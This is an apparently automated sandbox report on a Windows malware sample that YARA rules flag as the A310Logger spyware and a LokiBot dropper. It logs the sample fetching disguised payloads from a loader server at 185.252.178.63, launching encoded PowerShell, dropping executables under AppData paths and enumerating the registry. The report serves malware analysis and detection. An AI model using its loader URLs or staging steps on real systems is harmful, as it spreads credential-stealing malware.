Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: BPL_1000572_007.bat.exe, 0000000D.00000002.579528582.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.449921184.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.452428690.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467298844.000000000109D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://showip.net/
Source: BPL_1000572_007.bat.exe, 0000000D.00000002.579528582.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.449921184.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.452428690.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467298844.000000000109D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://showip.net/?checkip=
Source: BPL_1000572_007.bat.exe, 0000000D.00000003.468874553.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000002.579802617.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.468843725.0000000001094000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467326371.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467288810.0000000001094000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://unpkg.com/leaflet
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/json
Source: fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: BPL_1000572_007.bat.exe, BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: BPL_1000572_007.bat.exe, 0000000D.00000003.468874553.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000002.579802617.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467326371.00000000010AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.openstreetmap.org/copyright
Source: unknown DNS traffic detected: queries for: showip.net
Source: global traffic HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Project1sqliteHost: showip.net
Source: global traffic HTTP traffic detected: GET /loader/uploads/inf_Hpgwbzkt.bmp HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: BPL_1000572_007.bat.exe, 00000000.00000002.441497333.0000000000D38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: BPL_1000572_007.bat.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_00D2F288 0_2_00D2F288
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_00D21019 0_2_00D21019
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_00D2F945 0_2_00D2F945
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_00D2FA90 0_2_00D2FA90
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_00D2FA3A 0_2_00D2FA3A
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_00D2F3CC 0_2_00D2F3CC
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_02730040 0_2_02730040
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_027357E0 0_2_027357E0
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_02737C50 0_2_02737C50
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_02730102 0_2_02730102
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_027304F0 0_2_027304F0
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_0273D5E9 0_2_0273D5E9
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_00D258C4 0_2_00D258C4
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_03040040 17_2_03040040
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_030457E0 17_2_030457E0
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_0304D5F8 17_2_0304D5F8
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_03040102 17_2_03040102
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_030404F0 17_2_030404F0
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_031FF282 17_2_031FF282
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_031FF3CC 17_2_031FF3CC
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_031FFA3A 17_2_031FFA3A
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_031FF945 17_2_031FF945
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_031F1019 17_2_031F1019
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_031F58C4 17_2_031F58C4
Source: BPL_1000572_007.bat.exe Binary or memory string: OriginalFilename vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.479681642.0000000003A8F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.571147253.000000000CCE0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameAzyzrkioptrhfyauy.dll" vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000000.257250957.00000000005B4000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameArwiw.exep( vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.450440697.0000000002A11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.539813510.000000000448F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAzyzrkioptrhfyauy.dll" vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.441497333.0000000000D38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.571001353.0000000009A00000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArwiw.exep( vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.478616339.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 0000000D.00000000.436723511.000000000043A000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 0000000D.00000002.580085124.00000000010BD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArwiw.exep( vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe Binary or memory string: OriginalFilenameArwiw.exep( vs BPL_1000572_007.bat.exe
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe 3BAEBB36220C28C56A692E59E683C77026DAD821CADC377D0D8452D712CCF7A3
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File read: C:\Users\user\Desktop\BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Users\user\Desktop\BPL_1000572_007.bat.exe "C:\Users\user\Desktop\BPL_1000572_007.bat.exe"
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process created: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe "C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe"
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process created: C:\Users\user\Desktop\BPL_1000572_007.bat.exe C:\Users\user\Desktop\BPL_1000572_007.bat.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\note\pdf.exe "C:\Users\user\AppData\Roaming\note\pdf.exe"
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe"
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File created: C:\Users\user\AppData\Roaming\note
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File created: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@14/16@1/2
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File read: C:\Users\user\Desktop\desktop.ini
Source: BPL_1000572_007.bat.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5276
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_01
Source: BPL_1000572_007.bat.exe, 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: C*\AC:\Users\Dell\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1sqlite.vbpL;@"
Source: BPL_1000572_007.bat.exe, 0000000D.00000002.572590834.0000000000439000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: @@*\AC:\Users\Dell\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1sqlite.vbp
Source: BPL_1000572_007.bat.exe String found in binary or memory: Maggopfhjwohttp://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.pngP/r/ d/_CorExeMainmscoree.dll
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: BPL_1000572_007.bat.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: BPL_1000572_007.bat.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: .pdb= source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Xml.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: BPL_1000572_007.bat.exe, BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Core.pdb\ source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.pdbj source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Xml.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Core.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: mscorlib.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.PDBL source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Core.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.pdb4: source: WER8A92.tmp.dmp.21.dr
Source: Binary string: Wthdlxoyqvnqsfcfiinf.PDB source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256w^ source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.PDB source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.ni.pdb source: WER8A92.tmp.dmp.21.dr

Data Obfuscation

Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.486cee0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.486cee0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.cce0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.cce0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.571147253.000000000CCE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.590614103.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
